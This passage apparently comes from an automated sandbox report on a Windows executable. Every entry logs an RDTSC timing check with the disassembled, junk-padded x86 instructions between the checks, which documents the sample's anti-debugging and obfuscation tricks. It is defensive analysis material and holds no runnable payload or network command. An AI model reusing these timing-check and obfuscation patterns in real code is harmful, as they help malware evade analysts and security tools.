0x00000066 add esi, dword ptr [esp+24h] 0x0000006a stc 0x0000006b lodsw 0x0000006d stc 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F2830CF2D2Bh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b stc 0x0000007c nop 0x0000007d push edi 0x0000007e push eax 0x0000007f push edx 0x00000080 ja 00007F2830CF2D26h 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18C1 second address: CA18C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18C7 second address: CA18CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18CB second address: CA18CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA18CF second address: AF8C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push dword ptr [ebp+122D0089h] 0x0000000f jc 00007F2830CF2D2Ch 0x00000015 mov dword ptr [ebp+122D1CFBh], ebx 0x0000001b call dword ptr [ebp+122D2263h] 0x00000021 pushad 0x00000022 mov dword ptr [ebp+122D2226h], edi 0x00000028 xor eax, eax 0x0000002a cld 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f pushad 0x00000030 mov cl, 35h 0x00000032 push ecx 0x00000033 mov di, 8E28h 0x00000037 pop edi 0x00000038 popad 0x00000039 mov dword ptr [ebp+122D3B18h], eax 0x0000003f pushad 0x00000040 jmp 00007F2830CF2D2Ch 0x00000045 pushad 0x00000046 push ecx 0x00000047 pop esi 0x00000048 mov dword ptr [ebp+122D2226h], esi 0x0000004e popad 0x0000004f popad 0x00000050 mov esi, 0000003Ch 0x00000055 mov dword ptr [ebp+122D1DBDh], ecx 0x0000005b add dword ptr [ebp+122D32A6h], ecx 0x00000061 add esi, dword ptr [esp+24h] 0x00000065 stc 0x00000066 lodsw 0x00000068 stc 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F2830CF2D2Bh 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 stc 0x00000077 nop 0x00000078 push edi 0x00000079 push eax 0x0000007a push edx 0x0000007b ja 00007F2830CF2D26h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1935 second address: CA1939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1B51 second address: CA1B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1D49 second address: CA1D4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1EC3 second address: CA1ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1ECE second address: CA1F30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F2830CEE568h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 movzx ecx, ax 0x00000026 pushad 0x00000027 movsx ebx, dx 0x0000002a stc 0x0000002b popad 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F2830CEE568h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 nop 0x00000049 push edi 0x0000004a jne 00007F2830CEE56Ch 0x00000050 pop edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pop edx 0x00000057 pop eax 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1F30 second address: CA1F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F2830CF2D26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA1F3A second address: CA1F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA221A second address: CA221E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA221E second address: CA2263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov cx, 7998h 0x0000000e push 0000001Eh 0x00000010 jg 00007F2830CEE572h 0x00000016 jg 00007F2830CEE56Ch 0x0000001c mov edx, dword ptr [ebp+122D3635h] 0x00000022 nop 0x00000023 jmp 00007F2830CEE578h 0x00000028 push eax 0x00000029 push ebx 0x0000002a jo 00007F2830CEE56Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA2619 second address: CA2658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F2830CF2D34h 0x00000011 pop esi 0x00000012 pushad 0x00000013 jmp 00007F2830CF2D2Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA2658 second address: CA2693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 jno 00007F2830CEE56Ch 0x0000000d lea eax, dword ptr [ebp+1247C083h] 0x00000013 jnl 00007F2830CEE569h 0x00000019 movsx edx, di 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F2830CEE576h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA2718 second address: CA271C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CA271C second address: C828CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007F2830CEE572h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F2830CEE568h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D2F5Dh], ebx 0x0000002f call dword ptr [ebp+122D1C6Ah] 0x00000035 push edx 0x00000036 pushad 0x00000037 push ebx 0x00000038 pop ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C828CB second address: C828FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 ja 00007F2830CF2D2Eh 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007F2830CF2D39h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD32A second address: CCD34B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F2830CEE56Ah 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F2830CEE56Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD34B second address: CCD353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD353 second address: CCD359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD4D1 second address: CCD4DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD80F second address: CCD813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD813 second address: CCD81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD81E second address: CCD82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD82B second address: CCD837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CCD837 second address: CCD83D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C828DC second address: C828FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007F2830CF2D39h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD7A1B second address: CD7A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C624C0 second address: C624C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C624C7 second address: C624D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C624D2 second address: C624E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD642C second address: CD6432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD66F6 second address: CD671B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2830CF2D2Eh 0x00000008 jnc 00007F2830CF2D2Eh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD671B second address: CD6721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD6721 second address: CD6725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD689B second address: CD68A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F2830CEE566h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD6CCA second address: CD6CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D38h 0x00000007 jmp 00007F2830CF2D2Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD6E44 second address: CD6E77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F2830CEE570h 0x0000000e jc 00007F2830CEE566h 0x00000014 jmp 00007F2830CEE573h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD72EA second address: CD72F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD72F5 second address: CD732E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2830CEE579h 0x00000009 jbe 00007F2830CEE566h 0x0000000f popad 0x00000010 jmp 00007F2830CEE56Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: CD732E second address: CD7332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D4A8F1 second address: D4A8F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D57B53 second address: D57B57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D57B57 second address: D57B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F2830CEE56Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D5ABEF second address: D5ABF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D5ABF7 second address: D5AC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007F2830CEE576h 0x0000000c jmp 00007F2830CEE56Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D5AC26 second address: D5AC2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D67F9C second address: D67FA6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2830CEE572h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D67FA6 second address: D67FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2830CF2D26h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D67FB4 second address: D67FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7A9B5 second address: D7A9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7A9B9 second address: D7A9D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2830CEE566h 0x00000008 jno 00007F2830CEE566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2830CEE56Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7A86A second address: D7A89D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2830CF2D26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2830CF2D31h 0x0000000f pushad 0x00000010 jmp 00007F2830CF2D33h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E887 second address: D7E8B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2830CEE571h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007F2830CEE574h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E8B6 second address: D7E8BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E8BA second address: D7E8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7E8C4 second address: D7E8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7EA1A second address: D7EA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7EA20 second address: D7EA24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7EA24 second address: D7EA4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007F2830CEE57Ah 0x0000000f jmp 00007F2830CEE56Eh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F0FC second address: D7F128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2830CF2D2Dh 0x0000000a push edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007F2830CF2D32h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F128 second address: D7F12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F2A2 second address: D7F2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D7F2A6 second address: D7F2B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F2830CEE566h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D839A2 second address: D83A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jng 00007F2830CF2D3Bh 0x0000000d jmp 00007F2830CF2D35h 0x00000012 nop 0x00000013 mov dx, CC10h 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F2830CF2D28h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 or dword ptr [ebp+122D370Fh], esi 0x00000039 mov dword ptr [ebp+122D1D13h], edx 0x0000003f call 00007F2830CF2D29h 0x00000044 push eax 0x00000045 push edx 0x00000046 js 00007F2830CF2D28h 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A0A second address: D83A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A10 second address: D83A2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A2B second address: D83A35 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2830CEE566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83A35 second address: D83A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F2830CF2D28h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83CE7 second address: D83D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2830CEE56Fh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 jmp 00007F2830CEE575h 0x00000015 push dword ptr [ebp+122D1FD4h] 0x0000001b mov dword ptr [ebp+122D222Bh], esi 0x00000021 call 00007F2830CEE569h 0x00000026 pushad 0x00000027 jmp 00007F2830CEE573h 0x0000002c push edi 0x0000002d jmp 00007F2830CEE576h 0x00000032 pop edi 0x00000033 popad 0x00000034 push eax 0x00000035 push ebx 0x00000036 push ebx 0x00000037 push esi 0x00000038 pop esi 0x00000039 pop ebx 0x0000003a pop ebx 0x0000003b mov eax, dword ptr [esp+04h] 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 jmp 00007F2830CEE578h 0x00000047 pop edi 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D83D7F second address: D83DB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CF2D35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edi 0x0000000c jnl 00007F2830CF2D28h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a jmp 00007F2830CF2D2Ah 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: D8570E second address: D85723 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007F2830CEE566h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F2830CEE574h 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: C9B0D1 second address: C9B0D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50903AB second address: 50903F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2830CEE56Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2830CEE576h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov si, dx 0x00000014 mov ax, bx 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F2830CEE56Fh 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movsx edx, cx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\3LUyRfIoKs.exeRDTSC instruction interceptor: First address: 50903F4 second address: 50903F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
